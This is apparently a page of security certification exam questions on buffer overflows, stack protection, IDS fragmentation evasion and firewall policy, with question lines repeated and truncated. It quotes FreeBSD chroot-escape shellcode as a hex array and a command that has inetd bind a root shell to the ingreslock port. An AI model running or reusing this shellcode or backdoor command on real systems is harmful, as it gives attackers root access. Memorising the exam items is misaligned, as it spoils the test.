StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft’s /GS option use ____
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft’s /GS option use _____ defense against buffer overflow attacks.
what kind of attack?
#define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)>>8), \
(((x)&0xff0000)>>16), (((x)&0xff000000)>>24)
char infin_loop[]=
/* for testing purposes */
"xEBxFE";
char bsdcode[] =
/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
"x31xc0x50x50x50xb0x7excdx80x31xdbx31xc0x43"
"x43x53x4bx53x53xb0x5axcdx80xebx77x5ex31xc0"
"x8dx5ex01x88x46x04x66x68xffxffx01x53x53xb0"
"x88xcdx80x31xc0x8dx5ex01x53x53xb0x3dxcdx80"
"x31xc0x31xdbx8dx5ex08x89x43x02x31xc9xfexc9"
"x31xc0x8dx5ex08x53x53xb0x0cxcdx80xfexc9x75"
"xf1x31xc0x88x46x09x8dx5ex08x53x53xb0x3dxcd"
"x80xfex0exb0x30xfexc8x88x46x04x31xc0x88x46"
"x07x89x76x08x89x46x0cx89xf3x8dx4ex08x8dx56"
"x0cx52x51x53x53xb0x3bxcdx80x31xc0x31xdbx53"
"x53xb0x01xcdx80xe8x84xffxffxffxffx01xffxffx30"
"x62x69x6ex30x73x68x31x2ex2ex31x31x76x65x6e"
"x67x6cx69x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;
char *target=NULL, *username="user", *password=NULL;
struct targets getit;
The following exploit code is extracted from what kind of attack?
What is the most common cause of buffer overflow in software today?
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.
What is the most common cause of buffer overflow in software today?
What is a good example of a programming error that Bob can use to illustrate to the management that encryption
Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats, but it does not secure the application from coding errors. It can provide data privacy and integrity and enable strong authentication, but it cannot mitigate programming errors.
What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns?
What kind of attack is this program susceptible to?
The programmers on your team are analyzing the free, open source software being used to run FTP services on a server. They notice that there is an excessive number of fgets() and gets() calls in the source code. These C++ functions do not check bounds.
What kind of attack is this program susceptible to?
What is the purpose, and why is 'sh' shown twice?
Study the following exploit code taken from a Linux machine and answer the questions below:
echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x;
/usr/sbin/inetd -s /tmp/x;
sleep 10;
/bin/rm -f /tmp/x AAAA…AAA
In the above exploit code, the command "/bin/sh sh -I" is given.
What is the purpose, and why is 'sh' shown twice?
What is this technique called?
This IDS-defeating technique works by splitting a datagram (or packet) into multiple fragments so that the IDS will not spot the true nature of the fully assembled datagram. The datagram is not reassembled until it reaches its final destination. It would be a processor-intensive task for an IDS to reassemble all fragments itself, and on a busy system the packet will slip through the IDS onto the network.
What is this technique called?
Why will this not be possible?
Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of this server because of the potential for financial loss. Bob has asked his company’s firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network.
Why will this not be possible?
What can Angela’s IT department do to get access to the education website?
Angela is trying to access an education website that requires a username and password to log in. When Angela clicks on the link to access the login page, she gets an error message stating that the page can’t be reached. She contacts the website’s support team and they report that no one else is having any issues with the site. After handing the issue over to her company’s IT department, it is found that the education website requires that any computer accessing the site be able to respond to a ping from the education website’s server. Since Angela’s computer is behind a corporate firewall, her computer can’t ping the education website back.
What can Angela’s IT department do to get access to the education website?
Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the tr
SSL has been seen as the solution to a lot of common security problems. Administrators will oftentimes make use of SSL to encrypt communications from Point A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A and Point B?